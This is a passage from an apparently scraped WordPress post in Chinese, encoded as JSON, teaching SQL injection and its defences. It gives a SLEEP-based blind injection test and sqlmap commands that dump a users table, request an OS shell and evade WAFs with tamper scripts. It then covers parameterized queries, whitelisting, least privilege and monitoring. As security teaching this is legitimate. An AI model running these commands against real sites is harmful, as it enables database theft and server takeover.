AND SLEEP(5)<\/code><\/td>\n| \u662f\u5426\u660e\u663e\u5ef6\u8fdf<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n \u5982\u679c\u7b2c1\u6b65\u5c31\u62a5\u9519\u4e86\uff0c\u76f4\u63a5\u8fdb\u5165\u5229\u7528\u9636\u6bb5\u3002\u5982\u679c\u7b2c3\u6b65\u9875\u9762\u6709\u5dee\u5f02\uff0c\u5e03\u5c14\u76f2\u6ce8\u3002\u5982\u679c\u53ea\u6709\u7b2c4\u6b65\u6709\u6548\uff0c\u65f6\u95f4\u76f2\u6ce8\u3002<\/p>\n \u6ce8\u610f<\/strong>\uff1a\u6d4b\u8bd5\u65f6\u52a1\u5fc5\u5728\u5408\u6cd5\u6388\u6743\u8303\u56f4\u5185\uff08\u81ea\u5df1\u642d\u5efa\u7684\u9776\u573a\u3001\u6388\u6743\u7684\u6e17\u900f\u6d4b\u8bd5\u9879\u76ee\u7b49\uff09\u3002<\/p>\n
\n\u56db\u3001sqlmap \u81ea\u52a8\u5316\u5b9e\u6218<\/h2>\n\u624b\u5de5\u6ce8\u5165\u9002\u5408\u5b66\u4e60\u548c\u7406\u89e3\u539f\u7406\uff0c\u5b9e\u6218\u4e2d\u66f4\u5e38\u7528\u81ea\u52a8\u5316\u5de5\u5177\u3002sqlmap \u662f SQL \u6ce8\u5165\u7684\u745e\u58eb\u519b\u5200\u3002<\/p>\n \u57fa\u7840\u7528\u6cd5<\/h3>\n# \u63a2\u6d4b GET \u53c2\u6570\nsqlmap -u "http:\/\/target.com\/page.php?id=1"\n\n# \u6307\u5b9a\u53c2\u6570\uff0c\u63d0\u9ad8\u6548\u7387\nsqlmap -u "http:\/\/target.com\/page.php?id=1&cat=2" -p id\n\n# POST \u8bf7\u6c42\nsqlmap -u "http:\/\/target.com\/login.php" --data="user=admin&pass=123" -p user\n<\/code><\/pre>\n\u8fdb\u9636\u53c2\u6570<\/h3>\n# \u6709 Cookie\/Session \u65f6\u5e26\u4e0a\nsqlmap -u "http:\/\/target.com\/page.php?id=1" --cookie="PHPSESSID=xxx"\n\n# \u6307\u5b9a\u6570\u636e\u5e93\u7c7b\u578b\uff08\u8df3\u8fc7\u6307\u7eb9\u8bc6\u522b\uff0c\u52a0\u5feb\u901f\u5ea6\uff09\nsqlmap -u "..." --dbms=mysql\n\n# \u83b7\u53d6\u6570\u636e\u5e93\u5217\u8868\nsqlmap -u "..." --dbs\n\n# \u83b7\u53d6\u6307\u5b9a\u5e93\u7684\u6240\u6709\u8868\nsqlmap -u "..." -D dbname --tables\n\n# \u62d6\u6307\u5b9a\u8868\u7684\u6570\u636e\nsqlmap -u "..." -D dbname -T users --dump\n\n# \u5c1d\u8bd5\u83b7\u53d6 OS Shell\uff08\u9ad8\u98ce\u9669\uff0c\u9700\u6388\u6743\uff09\nsqlmap -u "..." --os-shell\n<\/code><\/pre>\n\u7ed5 WAF \u5e38\u7528 tamper<\/h3>\n# \u4f7f\u7528 tamper \u811a\u672c\u7ed5\u8fc7\u7b80\u5355 WAF\nsqlmap -u "..." --tamper=space2comment,randomcase,between\n\n# \u67e5\u770b\u6240\u6709\u53ef\u7528 tamper\nsqlmap --list-tampers\n<\/code><\/pre>\n\u5e38\u7528\u7684 tamper \u811a\u672c\uff1a<\/p>\n \n\n\n| Tamper<\/th>\n | \u4f5c\u7528<\/th>\n<\/tr>\n<\/thead>\n | \n\nspace2comment<\/code><\/td>\n\u7a7a\u683c\u66ff\u6362\u4e3a \/**\/<\/code><\/td>\n<\/tr>\n\nrandomcase<\/code><\/td>\n| \u968f\u673a\u5927\u5c0f\u5199\u7ed5\u8fc7\u5173\u952e\u5b57\u5339\u914d<\/td>\n<\/tr>\n | \nbetween<\/code><\/td>\n><\/code> \u66ff\u6362\u4e3a BETWEEN<\/code><\/td>\n<\/tr>\n\ncharencode<\/code><\/td>\n| URL \u7f16\u7801<\/td>\n<\/tr>\n | \ncharunicodeencode<\/code><\/td>\nUnicode \u7f16\u7801<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
\n\u4e94\u3001\u9632\u5fa1\u65b9\u6848\uff1a\u7eb5\u6df1\u9632\u5fa1<\/h2>\n\u5355\u70b9\u9632\u5fa1\u4e0d\u53ef\u9760\uff0c\u9700\u8981\u5c42\u5c42\u8bbe\u9632\u3002<\/p>\n 5.1 \u7b2c\u4e00\u5c42\uff1a\u4ee3\u7801\u5c42 \u2014 \u53c2\u6570\u5316\u67e5\u8be2<\/h3>\n\u8fd9\u662f\u6700\u6838\u5fc3\u3001\u6700\u6839\u672c\u7684\u9632\u5fa1\u624b\u6bb5\u3002<\/strong> \u53c2\u6570\u5316\u67e5\u8be2\u5c06 SQL \u7ed3\u6784\u4e0e\u6570\u636e\u5f7b\u5e95\u5206\u79bb\uff0c\u4ece\u673a\u5236\u4e0a\u675c\u7edd\u6ce8\u5165\u3002<\/p>\n\u9519\u8bef\u793a\u8303\uff08PHP\uff09\uff1a<\/p>\n $query = "SELECT * FROM users WHERE id = " . $_GET['id'];\n<\/code><\/pre>\n\u6b63\u786e\u505a\u6cd5\uff08PDO \u9884\u5904\u7406\uff09\uff1a<\/p>\n $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");\n$stmt->execute(['id' => $_GET['id']]);\n<\/code><\/pre>\nJava\uff08JDBC PreparedStatement\uff09\uff1a<\/p>\n PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE id = ?");\nstmt.setInt(1, userId);\n<\/code><\/pre>\n\u6ce8\u610f<\/strong>\uff1a\u53c2\u6570\u5316\u67e5\u8be2\u4e0d\u80fd\u7528\u4e8e\u8868\u540d\u3001\u5217\u540d\u3001ORDER BY<\/code> \u7b49\u52a8\u6001 SQL \u6807\u8bc6\u7b26\u3002\u8fd9\u4e9b\u573a\u666f\u9700\u8981\u767d\u540d\u5355\u6821\u9a8c<\/strong>\uff1a<\/p>\n$allowed_columns = ['id', 'username', 'email', 'create_time'];\n$order_by = in_array($_GET['order'], $allowed_columns) ? $_GET['order'] : 'id';\n<\/code><\/pre>\n5.2 \u7b2c\u4e8c\u5c42\uff1a\u8f93\u5165\u6821\u9a8c<\/h3>\n\n- \u7c7b\u578b\u5f3a\u5236<\/strong>\uff1aID \u5fc5\u987b\u662f\u6574\u6570 \u2192
intval()<\/code><\/li>\n- \u683c\u5f0f\u6821\u9a8c<\/strong>\uff1a\u90ae\u7bb1\u3001\u624b\u673a\u53f7\u7528\u6b63\u5219\u767d\u540d\u5355<\/li>\n
- \u957f\u5ea6\u9650\u5236<\/strong>\uff1a\u9632\u6b62\u901a\u8fc7\u8d85\u957f\u8f93\u5165\u7ed5\u8fc7<\/li>\n<\/ul>\n
5.3 \u7b2c\u4e09\u5c42\uff1a\u6700\u5c0f\u6743\u9650\u539f\u5219<\/h3>\n\u5e94\u7528\u8fde\u63a5\u6570\u636e\u5e93\u7684\u8d26\u53f7\u6c38\u8fdc\u4e0d\u8981\u7528 root<\/strong>\u3002<\/p>\n-- \u53ea\u7ed9\u5fc5\u8981\u7684\u6743\u9650\nGRANT SELECT, INSERT, UPDATE ON app_db.* TO 'app_user'@'localhost';\n<\/code><\/pre>\n\u8fd9\u6837\u5373\u4f7f\u53d1\u751f\u6ce8\u5165\uff0c\u653b\u51fb\u8005\u4e5f\u65e0\u6cd5\u6267\u884c DROP TABLE<\/code>\u3001LOAD_FILE<\/code>\u3001INTO OUTFILE<\/code> \u7b49\u9ad8\u5371\u64cd\u4f5c\u3002<\/p>\n5.4 \u7b2c\u56db\u5c42\uff1aWAF \/ \u6570\u636e\u5e93\u9632\u706b\u5899<\/h3>\n\u5728\u5e94\u7528\u4e4b\u524d\u52a0\u4e00\u5c42 WAF\uff08\u5982 ModSecurity\u3001Cloudflare WAF\uff09\uff0c\u62e6\u622a\u5e38\u89c1\u6ce8\u5165 payload\u3002\u6570\u636e\u5e93\u5c42\u4e5f\u53ef\u4ee5\u90e8\u7f72\u6570\u636e\u5e93\u9632\u706b\u5899\uff08\u5982 MySQL Enterprise Firewall\uff09\uff0c\u5b66\u4e60\u6b63\u5e38 SQL \u6a21\u5f0f\u540e\u963b\u65ad\u5f02\u5e38\u67e5\u8be2\u3002<\/p>\n 5.5 \u7b2c\u4e94\u5c42\uff1a\u65e5\u5fd7\u76d1\u63a7\u4e0e\u544a\u8b66<\/h3>\n\n- \u8bb0\u5f55\u6240\u6709 SQL \u9519\u8bef\u65e5\u5fd7<\/li>\n
- \u5bf9\u9ad8\u9891
information_schema<\/code> \u67e5\u8be2\u3001UNION SELECT<\/code> \u7b49\u7279\u5f81\u8bbe\u7f6e\u544a\u8b66<\/li>\n- \u5b9a\u671f\u5ba1\u8ba1\u6570\u636e\u5e93\u6162\u67e5\u8be2\u65e5\u5fd7\u4e2d\u7684\u5f02\u5e38\u6a21\u5f0f<\/li>\n<\/ul>\n
\n\u516d\u3001\u603b\u7ed3<\/h2>\nSQL \u6ce8\u5165\u7684\u653b\u9632\u672c\u8d28\u4e0a\u662f\u4e00\u573a\u4fe1\u606f\u4e0d\u5bf9\u79f0\u7684\u535a\u5f08\uff1a<\/p>\n \n\n\n| \u89c6\u89d2<\/th>\n | \u6838\u5fc3\u903b\u8f91<\/th>\n<\/tr>\n<\/thead>\n | \n\n\u653b\u51fb\u65b9<\/strong><\/td>\n| \u627e\u5230\u6570\u636e\u4e0e\u6307\u4ee4\u7684\u8fb9\u754c\u6a21\u7cca\u70b9\uff0c\u6ce8\u5165\u6076\u610f SQL<\/td>\n<\/tr>\n | \n\u9632\u5fa1\u65b9<\/strong><\/td>\n| \u7528\u53c2\u6570\u5316\u67e5\u8be2\u5f7b\u5e95\u5206\u79bb\u6570\u636e\u4e0e\u6307\u4ee4<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n \u53c2\u6570\u5316\u67e5\u8be2\u89e3\u51b3\u4e86 90% \u7684\u95ee\u9898\uff0c\u5269\u4e0b 10%\uff08\u52a8\u6001\u6392\u5e8f\u3001\u8868\u540d\u62fc\u63a5\u7b49\uff09\u9760\u767d\u540d\u5355\u6821\u9a8c\u3002\u518d\u52a0\u4e0a\u7eb5\u6df1\u9632\u5fa1\u7684\u5176\u4ed6\u5c42\u7ea7\u2014\u2014\u8f93\u5165\u6821\u9a8c\u3001\u6700\u5c0f\u6743\u9650\u3001WAF\u3001\u65e5\u5fd7\u76d1\u63a7\u2014\u2014\u53ef\u4ee5\u628a\u98ce\u9669\u964d\u5230\u53ef\u63a7\u8303\u56f4\u3002<\/p>\n \u6700\u540e\u63d0\u9192\u4e00\u53e5\uff1a\u672c\u6587\u6240\u6709\u6280\u672f\u4ec5\u4f9b\u5b66\u4e60\u4e0e\u6388\u6743\u6d4b\u8bd5\u4f7f\u7528<\/strong>\u3002\u672a\u6388\u6743\u7684\u6e17\u900f\u6d4b\u8bd5\u5c5e\u4e8e\u8fdd\u6cd5\u884c\u4e3a\u3002<\/p>\n
\n\u53c2\u8003\u8d44\u6e90<\/h2>\n\n- OWASP SQL Injection Prevention Cheat Sheet: https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/SQL_Injection_Prevention_Cheat_Sheet.html<\/li>\n
- sqlmap \u5b98\u65b9\u6587\u6863: https:\/\/github.com\/sqlmapproject\/sqlmap\/wiki<\/li>\n
- PortSwigger SQL Injection Tutorial: https:\/\/portswigger.net\/web-security\/sql-injection<\/li>\n
- DVWA\uff08\u7ec3\u4e60\u9776\u573a\uff09: https:\/\/github.com\/digininja\/DVWA<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
SQL\u6ce8\u5165\uff1a\u4ece\u539f\u7406\u5230\u9632\u5fa1\uff0c\u4e00\u6761\u5b8c\u6574\u7684\u653b\u9632\u94fe\u8def SQL\u6ce8\u5165\uff08SQL Injection\uff09\u662f\u4e00\u4e2a”\u53e4\u8001 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[40,41,42,37],"class_list":["post-79","post","type-post","status-publish","format-standard","hentry","category-iso","tag-sql","tag-web","tag-42","tag-37"],"_links":{"self":[{"href":"https:\/\/www.joezhou.top\/index.php?rest_route=\/wp\/v2\/posts\/79","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.joezhou.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.joezhou.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.joezhou.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.joezhou.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=79"}],"version-history":[{"count":1,"href":"https:\/\/www.joezhou.top\/index.php?rest_route=\/wp\/v2\/posts\/79\/revisions"}],"predecessor-version":[{"id":261,"href":"https:\/\/www.joezhou.top\/index.php?rest_route=\/wp\/v2\/posts\/79\/revisions\/261"}],"wp:attachment":[{"href":"https:\/\/www.joezhou.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=79"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.joezhou.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=79"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.joezhou.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=79"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}} | | |
| | | | | | | |
|